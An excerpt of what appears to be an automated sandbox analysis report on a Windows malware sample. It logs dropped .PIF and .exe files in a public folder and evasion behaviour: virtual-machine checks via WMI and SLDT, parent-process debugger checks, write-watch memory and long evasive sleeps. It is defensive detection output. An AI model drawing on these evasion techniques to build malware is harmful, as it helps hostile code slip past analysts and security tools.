Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 3D940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 3DDE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 3DD00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 25B80000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 25F70000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 27F70000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 3D900000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 3DD30000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 3FD30000 memory reserve \| memory write watch

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

23_2_004019F0

Contains functionality to detect virtual machines (SLDT)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 17_2_00007FFAABA20F6D sldt word ptr [eax]

17_2_00007FFAABA20F6D

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199809	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199687	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199305	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199172	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197547	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197435	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197328	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197219	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197109	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197000	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196880	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196766	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196652	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196544	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196403	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196229	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196124	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196012	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195854	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195728	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195608	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195470	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195295	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195143	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1194979	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1194835	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1194719	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199865
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199744
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199618
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199448
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199323
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199199
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199043
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198916
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198764
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198627
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198467
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198331
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199829
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199704
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199590
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199469
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199359
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199250
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199110
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198888
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198781
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198657
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198532
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198422
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198297
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198185
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198078
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197954
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197836
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197730
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197586
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197471
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197344
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197235
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197094
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196985
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196875

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3319	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2828	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5125	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4640	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4699	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5088	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window / User API: threadDelayed 4680	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window / User API: threadDelayed 5110	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window / User API: threadDelayed 2876
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window / User API: threadDelayed 3306
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window / User API: threadDelayed 3310
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window / User API: threadDelayed 6521

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Roaming\uc.exe

Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\Public\Libraries\Ucvuiswb.PIF

API coverage: 8.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1836	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3812	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7636	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 4699 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856	Thread sleep count: 5088 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 6480	Thread sleep count: 4680 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99872s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 6480	Thread sleep count: 5110 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99749s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99640s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99530s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99417s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99181s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -99071s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98959s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98843s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98734s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98624s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98515s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98399s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98296s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98176s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -98062s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97945s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97825s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97718s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97609s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97499s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97390s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97281s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97169s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -97062s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -96953s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -96843s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -96734s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -96624s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -96515s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1199809s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1199687s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1199305s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1199172s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1197547s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1197435s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1197328s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1197219s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1197109s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1197000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196880s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196766s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196652s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196544s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196403s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196229s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196124s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1196012s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1195854s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1195728s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1195608s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1195470s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1195295s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1195143s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1194979s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1194835s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908	Thread sleep time: -1194719s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -100000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 1928	Thread sleep count: 2876 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99879s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 1928	Thread sleep count: 3306 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99765s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99655s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99546s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99435s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99325s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99209s >= -30000s
